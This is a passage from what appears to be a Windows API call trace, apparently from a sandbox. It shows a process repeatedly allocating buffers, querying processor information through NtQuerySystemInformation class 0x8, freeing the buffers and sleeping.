0x295be90 [0303.205] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295be90, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295be90, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0303.206] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295be90 | out: hHeap=0x2560000) returned 1 [0303.206] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d198 [0303.206] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d198, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d198, ResultLength=0x19ee88*=0xc0) returned 0x0 [0303.206] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d198 | out: hHeap=0x2560000) returned 1 [0303.207] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0303.207] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0303.207] Sleep (dwMilliseconds=0x110) [0303.217] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d8a0 [0303.217] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d8a0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d8a0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0303.218] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d8a0 | out: hHeap=0x2560000) returned 1 [0303.218] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a818 [0303.218] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a818, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a818, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0303.219] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a818 | out: hHeap=0x2560000) returned 1 [0303.219] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295ba68 [0303.219] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ba68, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295ba68, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0303.219] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ba68 | out: hHeap=0x2560000) returned 1 [0303.219] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d0d0 [0303.219] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d0d0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d0d0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0303.220] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d0d0 | out: hHeap=0x2560000) returned 1 [0303.223] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0303.224] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0303.224] Sleep (dwMilliseconds=0x110) [0303.235] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6e0 [0303.235] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6e0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6e0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0303.236] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6e0 | out: hHeap=0x2560000) returned 1 [0303.236] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a5a8 [0303.236] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a5a8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a5a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0303.236] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a5a8 | out: hHeap=0x2560000) returned 1 [0303.236] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b640 [0303.236] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b640, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b640, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0303.237] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b640 | out: hHeap=0x2560000) returned 1 [0303.237] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c518 [0303.237] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c518, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c518, ResultLength=0x19ee88*=0xc0) returned 0x0 [0303.237] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c518 | out: hHeap=0x2560000) returned 1 [0303.237] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0303.238] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0303.238] Sleep (dwMilliseconds=0x110) [0303.250] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6e0 [0303.250] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6e0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6e0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0303.251] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6e0 | out: hHeap=0x2560000) returned 1 [0303.251] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a7b0 [0303.251] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a7b0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a7b0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0303.251] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a7b0 | out: hHeap=0x2560000) returned 1 [0303.251] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b938 [0303.251] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b938, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b938, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0303.252] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b938 | out: hHeap=0x2560000) returned 1 [0303.252] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d008 [0303.252] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d008, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d008, ResultLength=0x19ee88*=0xc0) returned 0x0 [0303.253] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d008 | out: hHeap=0x2560000) returned 1 [0303.277] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0303.277] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0303.277] Sleep (dwMilliseconds=0x110) [0303.295] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d590 [0303.295] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d590, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d590, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0303.296] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d590 | out: hHeap=0x2560000) returned 1 [0303.296] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a748 [0303.296] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a748, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a748, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0303.296] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a748 | out: hHeap=0x2560000) returned 1 [0303.296] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b5a8 [0303.296] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b5a8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b5a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0303.297] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b5a8 | out: hHeap=0x2560000) returned 1 [0303.297] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ce78 [0303.297] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ce78, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ce78, ResultLength=0x19ee88*=0xc0) returned 0x0 [0303.297] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ce78 | out: hHeap=0x2560000) returned 1 [0303.297] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0303.298] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0303.298] Sleep (dwMilliseconds=0x110) [0303.311] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d558 [0303.311] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d558, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d558, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0303.311] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d558 | out: hHeap=0x2560000) returned 1 [0303.312] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a9b8 [0303.312] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a9b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a9b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0303.312] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a9b8 | out: hHeap=0x2560000) returned 1 [0303.316] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b8a0 [0303.316] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b8a0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b8a0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0303.317] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b8a0 | out: hHeap=0x2560000) returned 1 [0303.317] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cc20 [0303.317] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cc20, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cc20, ResultLength=0x19ee88*=0xc0) returned 0x0 [0303.317] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cc20 | out: hHeap=0x2560000) returned 1 [0303.317] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0303.318] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0303.318] Sleep (dwMilliseconds=0x110) [0303.326] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d750 [0303.326] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d750, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d750, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0303.327] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d750 | out: hHeap=0x2560000) returned 1 [0303.327] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a678 [0303.327] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a678, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a678, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0303.327] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a678 | out: hHeap=0x2560000) returned 1 [0303.327] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bcc8 [0303.327] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bcc8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bcc8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0303.328] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bcc8 | out: hHeap=0x2560000) returned 1 [0303.328] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c518 [0303.328] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c518, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c518, ResultLength=0x19ee88*=0xc0) returned 0x0 [0303.328] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c518 | out: hHeap=0x2560000) returned 1 [0303.328] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0303.329] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0303.329] Sleep (dwMilliseconds=0x110) [0303.341] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d520 [0303.341] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d520, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d520, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0303.341] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d520 | out: hHeap=0x2560000) returned 1 [0303.344] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a950 [0303.344] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a950, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a950, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0303.345] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a950 | out: hHeap=0x2560000) returned 1 [0303.345] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bd60 [0303.345] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bd60, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bd60, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0303.346] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bd60 | out: hHeap=0x2560000) returned 1 [0303.346] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cdb0 [0303.346] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cdb0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cdb0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0303.346] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cdb0 | out: hHeap=0x2560000) returned 1 [0303.346] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0303.346] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0303.347] Sleep (dwMilliseconds=0x110) [0303.360] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d788 [0303.360] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d788, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d788, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0303.361] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d788 | out: hHeap=0x2560000) returned 1 [0303.361] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a610 [0303.361] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a610, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a610, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0303.361] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a610 | out: hHeap=0x2560000) returned 1 [0303.361] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295ba68 [0303.361] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ba68, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295ba68, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0303.362] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ba68 | out: hHeap=0x2560000) returned 1 [0303.362] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c6a8 [0303.362] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c6a8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c6a8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0303.362] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c6a8 | out: hHeap=0x2560000) returned 1 [0303.362] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0303.363] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0303.363] Sleep (dwMilliseconds=0x110) [0303.376] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6e0 [0303.376] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6e0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6e0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0303.377] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6e0 | out: hHeap=0x2560000) returned 1 [0303.377] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a748 [0303.377] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a748, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a748, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0303.377] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a748 | out: hHeap=0x2560000) returned 1 [0303.377] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c220 [0303.377] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c220, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c220, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0303.378] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c220 | out: hHeap=0x2560000) returned 1 [0303.378] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c770 [0303.378] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c770, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c770, ResultLength=0x19ee88*=0xc0) returned 0x0 [0303.378] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c770 | out: hHeap=0x2560000) returned 1 [0303.378] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0303.379] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0303.379] Sleep (dwMilliseconds=0x110) [0303.392] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d670 [0303.392] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d670, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d670, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0303.393] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d670 | out: hHeap=0x2560000) returned 1 [0303.393] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a678 [0303.393] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a678, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a678, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0303.394] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a678 | out: hHeap=0x2560000) returned 1 [0303.394] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c3e8 [0303.394] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c3e8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c3e8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0303.394] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c3e8 | out: hHeap=0x2560000) returned 1 [0303.394] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c900 [0303.394] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c900, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c900, ResultLength=0x19ee88*=0xc0) returned 0x0 [0303.395] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c900 | out: hHeap=0x2560000) returned 1 [0303.395] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0303.396] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0303.396] Sleep (dwMilliseconds=0x110) [0303.403] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d7c0 [0303.403] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d7c0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d7c0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0303.404] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d7c0 | out: hHeap=0x2560000) returned 1 [0303.408] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a880 [0303.408] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a880, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a880, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0303.408] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a880 | out: hHeap=0x2560000) returned 1 [0303.408] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c188 [0303.408] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c188, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c188, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0303.409] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c188 | out: hHeap=0x2560000) returned 1 [0303.409] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c5e0 [0303.409] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c5e0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c5e0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0303.409] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c5e0 | out: hHeap=0x2560000) returned 1 [0303.409] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0303.410] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0303.410] Sleep (dwMilliseconds=0x110) [0303.422] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d600 [0303.422] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d600, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d600, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0303.423] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d600 | out: hHeap=0x2560000) returned 1 [0303.423] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285abc0 [0303.423] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285abc0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285abc0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0303.424] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285abc0 | out: hHeap=0x2560000) returned 1 [0303.424] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bc30 [0303.424] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bc30, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bc30, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0303.424] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bc30 | out: hHeap=0x2560000) returned 1 [0303.424] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c9c8 [0303.424] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c9c8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c9c8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0303.425] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c9c8 | out: hHeap=0x2560000) returned 1 [0303.425] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0303.425] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0303.425] Sleep (dwMilliseconds=0x110) [0303.439] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d7c0 [0303.439] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d7c0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d7c0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0303.440] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d7c0 | out: hHeap=0x2560000) returned 1 [0303.440] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a8e8 [0303.440] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a8e8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a8e8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0303.440] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a8e8 | out: hHeap=0x2560000) returned 1 [0303.440] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bcc8 [0303.440] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bcc8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bcc8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0303.441] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bcc8 | out: hHeap=0x2560000) returned 1 [0303.441] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ce78 [0303.441] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ce78, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ce78, ResultLength=0x19ee88*=0xc0) returned 0x0 [0303.442] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ce78 | out: hHeap=0x2560000) returned 1 [0303.442] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0303.443] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0303.443] Sleep (dwMilliseconds=0x110) [0303.455] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6a8 [0303.455] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6a8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0303.456] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6a8 | out: hHeap=0x2560000) returned 1 [0303.456] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a880 [0303.456] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a880, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a880, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0303.457] HeapFree (in: hHeap=0x2560000, 